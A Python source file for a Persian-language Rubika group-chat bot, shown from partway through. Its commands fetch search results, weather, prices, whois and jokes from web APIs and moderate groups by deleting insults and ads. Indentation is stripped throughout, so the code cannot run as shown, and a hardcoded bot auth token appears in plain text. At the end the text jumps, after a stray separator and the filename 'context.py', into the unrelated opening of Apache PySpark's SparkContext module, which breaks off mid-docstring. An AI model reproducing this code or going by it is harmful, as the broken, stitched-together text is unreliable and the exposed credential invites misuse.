if hasInsult(search)[0] == False and chat['abs_object']['type'] == 'Group':
jd = json.loads(requests.get('https://zarebin.ir/api/?q=' + search + '&page=1&limit=10').text)
results = jd['results']['webs']
text = ''
for result in results:
text += result['title'] + '\n\n'
bot.sendMessage(chat['object_guid'], 'نتایج به پیوی شما ارسال شد', chat['last_message']['message_id'])
bot.sendMessage(chat['last_message']['author_object_guid'], 'نتایج یافت شده برای (' + search + ') : \n\n'+text)
elif chat['abs_object']['type'] == 'User':
jd = json.loads(requests.get('https://zarebin.ir/api/?q=' + search + '&page=1&limit=10').text)
results = jd['results']['webs']
text = ''
for result in results:
text += result['title'] + '\n\n'
bot.sendMessage(chat['object_guid'], text , chat['last_message']['message_id'])
return True
except:
print('search zarebin err')
bot.sendMessage(chat['object_guid'], 'در حال حاضر این دستور محدود یا در حال تعمیر است' , chat['last_message']['message_id'])
return False
def p_danesh(text,chat,bot):
try:
res = requests.get('http://api.codebazan.ir/danestani/pic/')
if res.status_code == 200 and res.content != b'':
b2 = res.content
width, height = bot.getImageSize(b2)
tx = bot.requestFile('jok_'+ str(random.randint(1000000, 9999999)) + '.png', len(b2), 'png')
access = bot.fileUpload(b2, tx['access_hash_send'], tx['id'], tx['upload_url'])
bot.sendImage(chat['object_guid'] ,tx['id'] , 'png', tx['dc_id'] , access, 'jok_'+ str(random.randint(1000000, 9999999)) + '.png', len(b2), str(bot.getThumbInline(b2))[2:-1] , width, height, message_id=chat['last_message']['message_id'])
print('sended file')
return True
except:
print('code bz danesh api bug')
return False
def anti_insult(text,chat,bot):
try:
admins = [i["member_guid"] for i in bot.getGroupAdmins(chat['object_guid'])["data"]["in_chat_members"]]
if not chat['last_message']['author_object_guid'] in admins:
print('yek ahmagh fohsh dad: ' + chat['last_message']['author_object_guid'])
bot.deleteMessages(chat['object_guid'], [chat['last_message']['message_id']])
return True
return False
except:
print('delete the fohsh err')
def anti_tabligh(text,chat,bot):
try:
admins = [i["member_guid"] for i in bot.getGroupAdmins(chat['object_guid'])["data"]["in_chat_members"]]
if not chat['last_message']['author_object_guid'] in admins:
print('yek ahmagh tabligh kard: ' + chat['last_message']['author_object_guid'])
bot.deleteMessages(chat['object_guid'], [chat['last_message']['message_id']])
return True
return False
except:
print('tabligh delete err')
def get_curruncy(text,chat,bot):
try:
t = json.loads(requests.get('https://api.codebazan.ir/arz/?type=arz').text)
text = ''
for i in t:
price = i['price'].replace(',','')[:-1] + ' تومان'
text += i['name'] + ' : ' + price + '\n'
bot.sendMessage(chat['object_guid'], text, chat['last_message']['message_id'])
except:
print('code bz arz err')
return True
def shot_image(text,chat,bot):
try:
c_id = chat['last_message']['message_id']
msg_data = bot.getMessagesInfo(chat['object_guid'], [c_id])
msg_data = msg_data[0]
if 'reply_to_message_id' in msg_data.keys():
msg_data = bot.getMessagesInfo(chat['object_guid'], [msg_data['reply_to_message_id']])[0]
if 'text' in msg_data.keys() and msg_data['text'].strip() != '':
txt_xt = msg_data['text']
res = requests.get('https://api.otherapi.tk/carbon?type=create&code=' + txt_xt + '&theme=vscode')
if res.status_code == 200 and res.content != b'':
b2 = res.content
tx = bot.requestFile('code_image.png', len(b2), 'png')
access = bot.fileUpload(b2, tx['access_hash_send'], tx['id'], tx['upload_url'])
width, height = bot.getImageSize(b2)
bot.sendImage(chat['object_guid'] ,tx['id'] , 'png', tx['dc_id'] , access, 'code_image.png', len(b2) , str(bot.getThumbInline(b2))[2:-1] , width, height ,message_id= c_id)
print('sended file')
except:
print('code bz shot err')
return True
def get_ip(text,chat,bot):
try:
ip = text[5:-1]
if hasInsult(ip)[0] == False:
jd = json.loads(requests.get('https://api.codebazan.ir/ipinfo/?ip=' + ip).text)
text = 'نام شرکت:\n' + jd['company'] + '\n\nکشور : \n' + jd['country_name'] + '\n\nارائه دهنده : ' + jd['isp']
bot.sendMessage(chat['object_guid'], text , chat['last_message']['message_id'])
except:
print('code bz ip err')
return True
def get_weather(text,chat,bot):
try:
city = text[10:-1]
if hasInsult(city)[0] == False:
jd = json.loads(requests.get('https://api.codebazan.ir/weather/?city=' + city).text)
text = 'دما : \n'+jd['result']['دما'] + '\n سرعت باد:\n' + jd['result']['سرعت باد'] + '\n وضعیت هوا: \n' + jd['result']['وضعیت هوا'] + '\n\n بروز رسانی اطلاعات امروز: ' + jd['result']['به روز رسانی'] + '\n\nپیش بینی هوا فردا: \n دما: ' + jd['فردا']['دما'] + '\n وضعیت هوا : ' + jd['فردا']['وضعیت هوا']
bot.sendMessage(chat['object_guid'], text , chat['last_message']['message_id'])
except:
print('code bz weather err')
return True
def get_whois(text,chat,bot):
try:
site = text[8:-1]
jd = json.loads(requests.get('https://api.codebazan.ir/whois/index.php?type=json&domain=' + site).text)
text = 'مالک : \n'+jd['owner'] + '\n\n آیپی:\n' + jd['ip'] + '\n\nآدرس مالک : \n' + jd['address'] + '\n\ndns1 : \n' + jd['dns']['1'] + '\ndns2 : \n' + jd['dns']['2']
bot.sendMessage(chat['object_guid'], text , chat['last_message']['message_id'])
except:
print('code bz whois err')
return True
def get_font(text,chat,bot):
try:
name_user = text[7:-1]
jd = json.loads(requests.get('https://api.codebazan.ir/font/?text=' + name_user).text)
jd = jd['result']
text = ''
for i in range(1,100):
text += jd[str(i)] + '\n'
if hasInsult(name_user)[0] == False and chat['abs_object']['type'] == 'Group':
bot.sendMessage(chat['object_guid'], 'نتایج کامل به پیوی شما ارسال شد', chat['last_message']['message_id'])
bot.sendMessage(chat['last_message']['author_object_guid'], 'نتایج یافت شده برای (' + name_user + ') : \n\n'+text)
elif chat['abs_object']['type'] == 'User':
bot.sendMessage(chat['object_guid'], text , chat['last_message']['message_id'])
except:
print('code bz font err')
return True
def get_ping(text,chat,bot):
try:
site = text[7:-1]
jd = requests.get('https://api.codebazan.ir/ping/?url=' + site).text
text = str(jd)
bot.sendMessage(chat['object_guid'], text , chat['last_message']['message_id'])
except:
print('code bz ping err')
return True
def get_gold(text,chat,bot):
try:
r = json.loads(requests.get('https://www.wirexteam.ga/gold').text)
change = str(r['data']['last_update'])
r = r['gold']
text = ''
for o in r:
text += o['name'] + ' : ' + o['nerkh_feli'] + '\n'
text += '\n\nآخرین تغییر : ' + change
bot.sendMessage(chat['object_guid'], text , chat['last_message']['message_id'])
except:
print('gold server err')
return True
def get_wiki(text,chat,bot):
try:
t = text[7:-1]
t = t.split(':')
mozoa = ''
t2 = ''
page = int(t[0])
for i in range(1,len(t)):
t2 += t[i]
mozoa = t2
if hasInsult(mozoa)[0] == False and chat['abs_object']['type'] == 'Group' and page > 0:
text_t = requests.get('https://api.codebazan.ir/wiki/?search=' + mozoa).text
if not 'codebazan.ir' in text_t:
CLEANR = re.compile('<.*?>')
def cleanhtml(raw_html):
cleantext = re.sub(CLEANR, '', raw_html)
return cleantext
text_t = cleanhtml(text_t)
n = 4200
text_t = text_t.strip()
max_t = page * n
min_t = max_t - n
text = text_t[min_t:max_t]
bot.sendMessage(chat['object_guid'], 'مقاله "'+ mozoa + '" صفحه : ' + str(page) + ' به پیوی شما ارسال شد', chat['last_message']['message_id'])
bot.sendMessage(chat['last_message']['author_object_guid'], 'نتایج یافت شده برای (' + mozoa + ') : \n\n'+text)
elif chat['abs_object']['type'] == 'User' and page > 0:
text_t = requests.get('https://api.codebazan.ir/wiki/?search=' + mozoa).text
if not 'codebazan.ir' in text_t:
CLEANR = re.compile('<.*?>')
def cleanhtml(raw_html):
cleantext = re.sub(CLEANR, '', raw_html)
return cleantext
text_t = cleanhtml(text_t)
n = 4200
text_t = text_t.strip()
max_t = page * n
min_t = max_t - n
text = text_t[min_t:max_t]
bot.sendMessage(chat['object_guid'], text, chat['last_message']['message_id'])
except:
print('code bz wiki err')
return True
def get_pa_na_pa(text,chat,bot):
try:
jd = requests.get('https://api.codebazan.ir/jok/pa-na-pa/').text
bot.sendMessage(chat['object_guid'], jd, chat['last_message']['message_id'])
except:
print('code bz pa na pa err')
return True
def get_dastan(text,chat,bot):
try:
jd = requests.get('https://api.codebazan.ir/dastan/').text
bot.sendMessage(chat['object_guid'], jd, chat['last_message']['message_id'])
except:
print('code bz dastan err')
return True
def get_search_k(text,chat,bot):
try:
search = text[11:-1]
if hasInsult(search)[0] == False and chat['abs_object']['type'] == 'Group':
jd = json.loads(requests.get('https://zarebin.ir/api/?q=' + search + '&page=1&limit=10').text)
results = jd['results']['webs']
text = ''
for result in results:
text += result['title'] + ':\n\n ' + str(result['description']).replace('</em>', '').replace('<em>', '').replace('(Meta Search Engine)', '').replace('"', '').replace(' — ', '').replace(' AP', '') + '\n\n'
bot.sendMessage(chat['object_guid'], 'نتایج کامل به پیوی شما ارسال شد', chat['last_message']['message_id'])
bot.sendMessage(chat['last_message']['author_object_guid'], 'نتایج یافت شده برای (' + search + ') : \n\n'+text)
elif chat['abs_object']['type'] == 'User':
jd = json.loads(requests.get('https://zarebin.ir/api/?q=' + search + '&page=1&limit=10').text)
results = jd['results']['webs']
text = ''
for result in results:
text += result['title'] + ':\n\n ' + str(result['description']).replace('</em>', '').replace('<em>', '').replace('(Meta Search Engine)', '').replace('"', '').replace(' — ', '').replace(' AP', '') + '\n\n'
bot.sendMessage(chat['object_guid'], text , chat['last_message']['message_id'])
except:
print('zarebin search err')
return True
def get_bio(text,chat,bot):
try:
jd = requests.get('https://api.codebazan.ir/bio/').text
bot.sendMessage(chat['object_guid'], jd, chat['last_message']['message_id'])
except:
print('code bz bio err')
return True
def get_trans(text,chat,bot):
try:
t = text[8:-1]
t = t.split(':')
lang = t[0]
t2 = ''
for i in range(1,len(t)):
t2 += t[i]
text_trans = t2
if hasInsult(text_trans)[0] == False:
t = Translator()
text = t.translate(text_trans,lang).text
bot.sendMessage(chat['object_guid'], text, chat['last_message']['message_id'])
elif chat['abs_object']['type'] == 'User':
t = Translator()
text = t.translate(text_trans,lang).text
bot.sendMessage(chat['object_guid'], text, chat['last_message']['message_id'])
except:
print('google trans err')
return True
def get_khatere(text,chat,bot):
try:
jd = requests.get('https://api.codebazan.ir/jok/khatere/').text
bot.sendMessage(chat['object_guid'], jd, chat['last_message']['message_id'])
except:
print('code bz khatere err')
return True
def get_danesh(text,chat,bot):
try:
jd = requests.get('https://api.codebazan.ir/danestani/').text
bot.sendMessage(chat['object_guid'], jd, chat['last_message']['message_id'])
except:
print('code bz danesh err')
return True
def get_alaki_masala(text,chat,bot):
try:
jd = requests.get('https://api.codebazan.ir/jok/alaki-masalan/').text
bot.sendMessage(chat['object_guid'], jd, chat['last_message']['message_id'])
except:
print('code bz alaki masala err')
return True
def name_shakh(text,chat,bot):
try:
jd = requests.get('https://api.codebazan.ir/name/').text
bot.sendMessage(chat['object_guid'], jd, chat['last_message']['message_id'])
except:
print('code bz name err')
def get_vaj(text,chat,bot):
try:
vaj = text[6:-1]
if hasInsult(vaj)[0] == False:
jd = json.loads(requests.get('https://api.codebazan.ir/vajehyab/?text=' + vaj).text)
jd = jd['result']
text = 'معنی : \n'+jd['mani'] + '\n\n لغتنامه معین:\n' + jd['Fmoein'] + '\n\nلغتنامه دهخدا : \n' + jd['Fdehkhoda'] + '\n\nمترادف و متضاد : ' + jd['motaradefmotezad']
bot.sendMessage(chat['object_guid'], text , chat['last_message']['message_id'])
except:
print('code bz vaj err')
def get_font_fa(text,chat,bot):
try:
site = text[10:-1]
jd = json.loads(requests.get('https://api.codebazan.ir/font/?type=fa&text=' + site).text)
jd = jd['Result']
text = ''
for i in range(1,10):
text += jd[str(i)] + '\n'
if hasInsult(site)[0] == False and chat['abs_object']['type'] == 'Group':
bot.sendMessage(chat['object_guid'], 'نتایج کامل به پیوی شما ارسال شد', chat['last_message']['message_id'])
bot.sendMessage(chat['last_message']['author_object_guid'], 'نتایج یافت شده برای (' + site + ') : \n\n'+text)
elif chat['abs_object']['type'] == 'User':
bot.sendMessage(chat['object_guid'], text , chat['last_message']['message_id'])
except:
print('code bz font fa err')
def get_leaved(text,chat,bot):
try:
send_text = 'بای بای 🖖'
bot.sendMessage(chat['object_guid'], send_text, chat['last_message']['message_id'])
except:
print('rub server err')
def get_added(text,chat,bot):
try:
group = chat['abs_object']['title']
send_text = 'سلام دوست عزیز به ' + group + ' خوش آمدی ❤ \n لطفا قوانین رو رعایت کن ✅'
bot.sendMessage(chat['object_guid'], send_text, chat['last_message']['message_id'])
except:
print('rub server err')
def get_help(text,chat,bot):
text = open('help.txt','r').read()
if chat['abs_object']['type'] == 'Group':
bot.sendMessage(chat['object_guid'], 'نتایج کامل به پیوی شما ارسال شد', chat['last_message']['message_id'])
bot.sendMessage(chat['last_message']['author_object_guid'], text)
elif chat['abs_object']['type'] == 'User':
bot.sendMessage(chat['object_guid'], text, chat['last_message']['message_id'])
print('help guid sended')
def usvl_save_data(text,chat,bot):
try:
c_id = chat['last_message']['message_id']
msg_data = bot.getMessagesInfo(chat['object_guid'], [c_id])
msg_data = msg_data[0]
if 'reply_to_message_id' in msg_data.keys():
msg_data = bot.getMessagesInfo(chat['object_guid'], [msg_data['reply_to_message_id']])[0]
if 'text' in msg_data.keys() and msg_data['text'].strip() != '':
txt_xt = msg_data['text']
f3 = len(open('farsi-dic.txt','rb').read())
if f3 < 83886080:
f2 = open('farsi-dic.txt','r').read().split('|/|\n')[:-1]
f2 = [i.split('|=|')[0] for i in f2]
if not txt_xt in f2:
f2 = open('farsi-dic.txt','a')
f2.write(txt_xt + '|=|' + text + '|/|\n')
f2.close()
else:
bot.sendMessage(chat['object_guid'], '!usvl_stop')
b2 = open('farsi-dic.txt','rb').read()
tx = bot.requestFile('farsi-dic.txt', len(b2), 'txt')
access = bot.fileUpload(b2, tx['access_hash_send'], tx['id'], tx['upload_url'])
bot.sendFile(chat['object_guid'] ,tx['id'] , 'txt', tx['dc_id'] , access, 'farsi-dic.txt', len(b2), message_id=c_id)
return True
except:
print('server rubika err')
def usvl_test_data(text,chat,bot):
try:
f2 = open('farsi-dic.txt','r').read().split('|/|\n')[:-1]
texts = [i.split('|=|')[0] for i in f2]
replies = [i.split('|=|')[1] for i in f2]
shebahat = 0.0
a = 0
shabih_tarin = None
for text2 in texts:
sh2 = similar(text, text2)
if sh2 > shebahat:
shebahat = sh2
shabih_tarin = a
a += 1
print('shabih tarin: ' + str(shabih_tarin) , '|| darsad shebaht :' + str(shebahat))
if shabih_tarin != None:
bot.sendMessage(chat['object_guid'], replies[shabih_tarin], chat['last_message']['message_id'])
except:
print('server rubika err')
def get_backup(text,chat,bot):
try:
b2 = open('farsi-dic.txt','rb').read()
tx = bot.requestFile('farsi-dic.txt', len(b2), 'txt')
access = bot.fileUpload(b2, tx['access_hash_send'], tx['id'], tx['upload_url'])
bot.sendFile(chat['object_guid'] ,tx['id'] , 'txt', tx['dc_id'] , access, 'farsi-dic.txt', len(b2), message_id=chat['last_message']['message_id'])
except:
print('back err')
g_usvl = ''
test_usvl = False
auth = "wxhowsospgttjkzekifbuuodgylafvrj"
bot = Bot(auth)
list_message_seened = []
time_reset = random._floor(datetime.datetime.today().timestamp()) + 350
while(2 > 1):
try:
chats_list:list = bot.get_updates_all_chats()
qrozAdmins = open('qrozAdmins.txt','r').read().split('\n')
if chats_list != []:
for chat in chats_list:
access = chat['access']
if chat['abs_object']['type'] == 'User' or chat['abs_object']['type'] == 'Group':
text:str = chat['last_message']['text']
print(chat)
if 'SendMessages' in access and chat['last_message']['type'] == 'Text' and text.strip() != '':
text = text.strip()
m_id = chat['object_guid'] + chat['last_message']['message_id']
if not m_id in list_message_seened:
print('new message')
if text == '!start':
print('message geted and sinned')
try:
bot.sendMessage(chat['object_guid'], 'سلام \n به ابر سرویس کروز خوش آمدید ❤\n\n لطفا جهت راهنما \n!help \nرا ارسال کنید',chat['last_message']['message_id'])
print('sended response')
except:
print('server bug1')
elif text.startswith('!nim http://') == True or text.startswith('!nim https://') == True:
try:
bot.sendMessage(chat['object_guid'], "در حال آماده سازی لینک ...",chat['last_message']['message_id'])
print('sended response')
link = text[4:]
nim_baha_link=requests.post("https://www.digitalbam.ir/DirectLinkDownloader/Download",params={'downloadUri':link})
pg:str = nim_baha_link.text
pg = pg.split('{"fileUrl":"')
pg = pg[1]
pg = pg.split('","message":""}')
pg = pg[0]
nim_baha = pg
try:
bot.sendMessage(chat['object_guid'], 'لینک نیم بها شما با موفقیت آماده شد ✅ \n لینک : \n' + nim_baha ,chat['last_message']['message_id'])
print('sended response')
except:
print('server bug2')
except:
print('server bug3')
elif text.startswith('!info @'):
tawd10 = Thread(target=info_qroz, args=(text, chat, bot,))
tawd10.start()
elif text.startswith('!search ['):
tawd11 = Thread(target=search, args=(text, chat, bot,))
tawd11.start()
elif text.startswith('!wiki-s ['):
try:
search = text[9:-1]
search = search + ' ویکی پدیا'
if hasInsult(search)[0] == False and chat['abs_object']['type'] == 'Group':
jd = json.loads(requests.get('https://zarebin.ir/api/?q=' + search + '&page=1&limit=10').text)
results = jd['results']['webs'][0:4]
text = ''
for result in results:
if ' - ویکیپدیا، دانشنامهٔ آزاد' in result['title']:
title = result['title'].replace(' - ویکیپدیا، دانشنامهٔ آزاد','')
text += title + ' :\n\n' + str(result['description']).replace('</em>', '').replace('<em>', '').replace('(Meta Search Engine)', '').replace('"', '').replace(' — ', '').replace(' AP', '') + '\n\nمقاله کامل صفحه 1 : \n' + '!wiki [1:' + title + ']\n\n'
bot.sendMessage(chat['object_guid'], 'نتایج به پیوی شما ارسال شد', chat['last_message']['message_id'])
bot.sendMessage(chat['last_message']['author_object_guid'], 'نتایج یافت شده برای (' + search + ') : \n\n'+text)
elif chat['abs_object']['type'] == 'User':
jd = json.loads(requests.get('https://zarebin.ir/api/?q=' + search + '&page=1&limit=10').text)
results = jd['results']['webs'][0:4]
text = ''
for result in results:
if ' - ویکیپدیا، دانشنامهٔ آزاد' in result['title']:
title = result['title'].replace(' - ویکیپدیا، دانشنامهٔ آزاد','')
text += title + ' :\n\n' + str(result['description']).replace('</em>', '').replace('<em>', '').replace('(Meta Search Engine)', '').replace('"', '').replace(' — ', '').replace(' AP', '') + '\n\nمقاله کامل صفحه 1 : \n' + '!wiki [1:' + title + ']\n\n'
bot.sendMessage(chat['object_guid'], text , chat['last_message']['message_id'])
except:
print('wiki s err')
elif text.startswith('!jok'):
tawd9 = Thread(target=joker, args=(text, chat, bot,))
tawd9.start()
elif text.startswith('!name_shakh'):
tawd32 = Thread(target=name_shakh, args=(text, chat, bot,))
tawd32.start()
elif text.startswith('!khatere'):
tawd29 = Thread(target=get_khatere, args=(text, chat, bot,))
tawd29.start()
elif text.startswith('!danesh'):
tawd30 = Thread(target=get_danesh, args=(text, chat, bot,))
tawd30.start()
elif text.startswith('!pa_na_pa'):
tawd24 = Thread(target=get_pa_na_pa, args=(text, chat, bot,))
tawd24.start()
elif text.startswith('!alaki_masala'):
tawd31 = Thread(target=get_alaki_masala, args=(text, chat, bot,))
tawd31.start()
elif text.startswith('!dastan'):
tawd25 = Thread(target=get_dastan, args=(text, chat, bot,))
tawd25.start()
elif text.startswith('!bio'):
tawd27 = Thread(target=get_bio, args=(text, chat, bot,))
tawd27.start()
elif text.startswith('!search-k ['):
tawd26 = Thread(target=get_search_k, args=(text, chat, bot,))
tawd26.start()
elif text.startswith('!ban [') and chat['abs_object']['type'] == 'Group' and 'BanMember' in access:
try:
user = text[6:-1].replace('@', '')
guid = bot.getInfoByUsername(user)["data"]["chat"]["abs_object"]["object_guid"]
admins = [i["member_guid"] for i in bot.getGroupAdmins(chat['object_guid'])["data"]["in_chat_members"]]
if not guid in admins and chat['last_message']['author_object_guid'] in admins:
bot.banGroupMember(chat['object_guid'], guid)
bot.sendMessage(chat['object_guid'], 'انجام شد' , chat['last_message']['message_id'])
except:
print('ban bug')
elif text.startswith('!search-i ['):
print('mpa started')
tawd = Thread(target=search_i, args=(text, chat, bot,))
tawd.start()
elif text.startswith('!remove') and chat['abs_object']['type'] == 'Group' and 'BanMember' in access:
print('mpa started')
tawd2 = Thread(target=uesr_remove, args=(text, chat, bot,))
tawd2.start()
elif text.startswith('!trans ['):
tawd28 = Thread(target=get_trans, args=(text, chat, bot,))
tawd28.start()
elif text.startswith('!myket-s ['):
try:
search = text[10:-1]
if hasInsult(search)[0] == False and chat['abs_object']['type'] == 'Group':
bot.sendMessage(chat['object_guid'], 'نتایج کامل به زودی به پیوی شما ارسال میشوند', chat['last_message']['message_id'])
jd = json.loads(requests.get('https://www.wirexteam.ga/myket?type=search&query=' + search).text)
jd = jd['search']
a = 0
text = ''
for j in jd:
if a <= 7:
text += '🔸 عنوان : ' + j['title_fa'] + '\nℹ️ توضیحات : '+ j['tagline'] + '\n🆔 نام یکتا برنامه : ' + j['package_name'] + '\n⭐️امتیاز: ' + str(j['rate']) + '\n✳ نام نسخه : ' + j['version'] + '\nقیمت : ' + j['price'] + '\nحجم : ' + j['size'] + '\nبرنامه نویس : ' + j['developer'] + '\n\n'
a += 1
else:
break
if text != '':
bot.sendMessage(chat['last_message']['author_object_guid'], 'نتایج یافت شده برای (' + search + ') : \n\n'+text)
elif chat['abs_object']['type'] == 'User':
jd = json.loads(requests.get('https://www.wirexteam.ga/myket?type=search&query=' + search).text)
jd = jd['search']
a = 0
text = ''
for j in jd:
if a <= 7:
text += '🔸 عنوان : ' + j['title_fa'] + '\nℹ️ توضیحات : '+ j['tagline'] + '\n🆔 نام یکتا برنامه : ' + j['package_name'] + '\n⭐️امتیاز: ' + str(j['rate']) + '\n✳ نام نسخه : ' + j['version'] + '\nقیمت : ' + j['price'] + '\nحجم : ' + j['size'] + '\nبرنامه نویس : ' + j['developer'] + '\n\n'
a += 1
else:
break
if text != '':
bot.sendMessage(chat['object_guid'], text , chat['last_message']['message_id'])
except:
print('myket server err')
elif text.startswith('!wiki ['):
tawd23 = Thread(target=get_wiki, args=(text, chat, bot,))
tawd23.start()
elif text.startswith('!currency'):
print('mpa started')
tawd15 = Thread(target=get_curruncy, args=(text, chat, bot,))
tawd15.start()
elif text.startswith('!gold'):
tawd22 = Thread(target=get_gold, args=(text, chat, bot,))
tawd22.start()
elif text.startswith('!ping ['):
tawd21 = Thread(target=get_ping, args=(text, chat, bot,))
tawd21.start()
elif text.startswith('!font ['):
tawd20 = Thread(target=get_font, args=(text, chat, bot,))
tawd20.start()
elif text.startswith('!font-fa ['):
tawd34 = Thread(target=get_font_fa, args=(text, chat, bot,))
tawd34.start()
elif text.startswith('!whois ['):
tawd19 = Thread(target=get_whois, args=(text, chat, bot,))
tawd19.start()
elif text.startswith('!vaj ['):
tawd33 = Thread(target=get_vaj, args=(text, chat, bot,))
tawd33.start()
elif text.startswith('!weather ['):
tawd18 = Thread(target=get_weather, args=(text, chat, bot,))
tawd18.start()
elif text.startswith('!ip ['):
tawd17 = Thread(target=get_ip, args=(text, chat, bot,))
tawd17.start()
elif text.startswith("!add [") and chat['abs_object']['type'] == 'Group' and 'AddMember' in access:
try:
user = text[6:-1]
bot.invite(chat['object_guid'], [bot.getInfoByUsername(user.replace('@', ''))["data"]["chat"]["object_guid"]])
bot.sendMessage(chat['object_guid'], 'اضافه شد' , chat['last_message']['message_id'])
except:
print('add not successd')
elif text.startswith('!math ['):
try:
amal_and_value = text[7:-1]
natije = ''
if amal_and_value.count('*') == 1:
value1 = float(amal_and_value.split('*')[0].strip())
value2 = float(amal_and_value.split('*')[1].strip())
natije = value1 * value2
elif amal_and_value.count('/') > 0:
value1 = float(amal_and_value.split('/')[0].strip())
value2 = float(amal_and_value.split('/')[1].strip())
natije = value1 / value2
elif amal_and_value.count('+') > 0:
value1 = float(amal_and_value.split('+')[0].strip())
value2 = float(amal_and_value.split('+')[1].strip())
natije = value1 + value2
elif amal_and_value.count('-') > 0:
value1 = float(amal_and_value.split('-')[0].strip())
value2 = float(amal_and_value.split('-')[1].strip())
natije = value1 - value2
elif amal_and_value.count('**') > 0:
value1 = float(amal_and_value.split('**')[0].strip())
value2 = float(amal_and_value.split('**')[1].strip())
natije = value1 ** value2
if natije != '':
bot.sendMessage(chat['object_guid'], natije , chat['last_message']['message_id'])
except:
print('math err')
elif text.startswith('!shot'):
tawd16 = Thread(target=shot_image, args=(text, chat, bot,))
tawd16.start()
elif text.startswith('!speak'):
print('mpa started')
tawd6 = Thread(target=speak_after, args=(text, chat, bot,))
tawd6.start()
elif text.startswith('!p_danesh'):
tawd12 = Thread(target=p_danesh, args=(text, chat, bot,))
tawd12.start()
elif text.startswith('!write ['):
print('mpa started')
tawd5 = Thread(target=write_image, args=(text, chat, bot,))
tawd5.start()
elif chat['abs_object']['type'] == 'Group' and 'DeleteGlobalAllMessages' in access and hasInsult(text)[0] == True:
tawd13 = Thread(target=anti_insult, args=(text, chat, bot,))
tawd13.start()
elif chat['abs_object']['type'] == 'Group' and 'DeleteGlobalAllMessages' in access and hasAds(text) == True:
tawd14 = Thread(target=anti_tabligh, args=(text, chat, bot,))
tawd14.start()
elif text.startswith('!help'):
tawd38 = Thread(target=get_help, args=(text, chat, bot,))
tawd38.start()
elif text.startswith('!usvl_start') and chat['abs_object']['type'] == 'Group' and chat['last_message']['author_object_guid'] in qrozAdmins and g_usvl == '':
g_usvl = chat['object_guid']
bot.sendMessage(chat['object_guid'], 'usvl is started', chat['last_message']['message_id'])
elif text.startswith('!usvl_stop') and chat['abs_object']['type'] == 'Group' and chat['last_message']['author_object_guid'] in qrozAdmins and g_usvl != '':
g_usvl = ''
bot.sendMessage(chat['object_guid'], 'usvl is stopped', chat['last_message']['message_id'])
elif text.startswith('!usvl_test') and chat['abs_object']['type'] == 'Group' and chat['last_message']['author_object_guid'] in qrozAdmins and g_usvl == '' and test_usvl == False:
test_usvl = True
bot.sendMessage(chat['object_guid'], 'test usvl is started', chat['last_message']['message_id'])
elif text.startswith('!usvl_untest') and chat['abs_object']['type'] == 'Group' and chat['last_message']['author_object_guid'] in qrozAdmins and test_usvl == True:
test_usvl = False
bot.sendMessage(chat['object_guid'], 'test usvl is stopped', chat['last_message']['message_id'])
elif text.startswith('!backup') and chat['object_guid'] in qrozAdmins:
tawd44 = Thread(target=get_backup, args=(text, chat, bot,))
tawd44.start()
elif chat['object_guid'] == g_usvl and chat['last_message']['author_object_guid'] != 'u0DHSrv0bd39028f37e44305e207e38a' and chat['abs_object']['type'] == 'Group':
tawd42 = Thread(target=usvl_save_data, args=(text, chat, bot,))
tawd42.start()
elif test_usvl == True and chat['last_message']['author_object_guid'] != 'u0DHSrv0bd39028f37e44305e207e38a' and chat['abs_object']['type'] == 'Group':
print('usvl tested')
tawd43 = Thread(target=usvl_test_data, args=(text, chat, bot,))
tawd43.start()
list_message_seened.append(m_id)
elif 'SendMessages' in access and chat['last_message']['type'] == 'Other' and text.strip() != '' and chat['abs_object']['type'] == 'Group' and chat['abs_object']['type'] == 'Group':
text = text.strip()
m_id = chat['object_guid'] + chat['last_message']['message_id']
if not m_id in list_message_seened:
if text == 'یک عضو گروه را ترک کرد.':
tawd35 = Thread(target=get_leaved, args=(text, chat, bot,))
tawd35.start()
elif text == '1 عضو جدید به گروه افزوده شد.' or text == 'یک عضو از طریق لینک به گروه افزوده شد.':
tawd36 = Thread(target=get_added, args=(text, chat, bot,))
tawd36.start()
list_message_seened.append(m_id)
elif 'SendMessages' in access and text.strip() != '' and chat['abs_object']['type'] == 'Group':
text = text.strip()
m_id = chat['object_guid'] + chat['last_message']['message_id']
if not m_id in list_message_seened:
if 'DeleteGlobalAllMessages' in access and hasInsult(text)[0] == True:
tawd39 = Thread(target=anti_insult, args=(text, chat, bot,))
tawd39.start()
list_message_seened.append(m_id)
elif 'DeleteGlobalAllMessages' in access and hasAds(text) == True:
tawd40 = Thread(target=anti_tabligh, args=(text, chat, bot,))
tawd40.start()
list_message_seened.append(m_id)
else:
print('no update ')
except:
print('qroz err koli')
time_reset2 = random._floor(datetime.datetime.today().timestamp())
if list_message_seened != [] and time_reset2 > time_reset:
list_message_seened = []
time_reset = random._floor(datetime.datetime.today().timestamp()) + 350
|
context.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import shutil
import signal
import sys
import threading
import warnings
import importlib
from threading import RLock
from tempfile import NamedTemporaryFile
from py4j.protocol import Py4JError
from py4j.java_gateway import is_instance_of
from pyspark import accumulators, since
from pyspark.accumulators import Accumulator
from pyspark.broadcast import Broadcast, BroadcastPickleRegistry
from pyspark.conf import SparkConf
from pyspark.files import SparkFiles
from pyspark.java_gateway import launch_gateway, local_connect_and_auth
from pyspark.serializers import PickleSerializer, BatchedSerializer, UTF8Deserializer, \
PairDeserializer, AutoBatchedSerializer, NoOpSerializer, ChunkedStream
from pyspark.storagelevel import StorageLevel
from pyspark.resource.information import ResourceInformation
from pyspark.rdd import RDD, _load_from_socket
from pyspark.taskcontext import TaskContext
from pyspark.traceback_utils import CallSite, first_spark_call
from pyspark.status import StatusTracker
from pyspark.profiler import ProfilerCollector, BasicProfiler
__all__ = ['SparkContext']
# These are special default configs for PySpark, they will overwrite
# the default ones for Spark if they are not configured by user.
DEFAULT_CONFIGS = {
"spark.serializer.objectStreamReset": 100,
"spark.rdd.compress": True,
}
class SparkContext(object):
"""
Main entry point for Spark functionality. A SparkContext represents the
connection to a Spark cluster, and can be used to create :class:`RDD` and
broadcast variables on that cluster.
When you create a new SparkContext, at least the master and app name should
be set, either through the named parameters here or through `conf`.
Parameters
----------
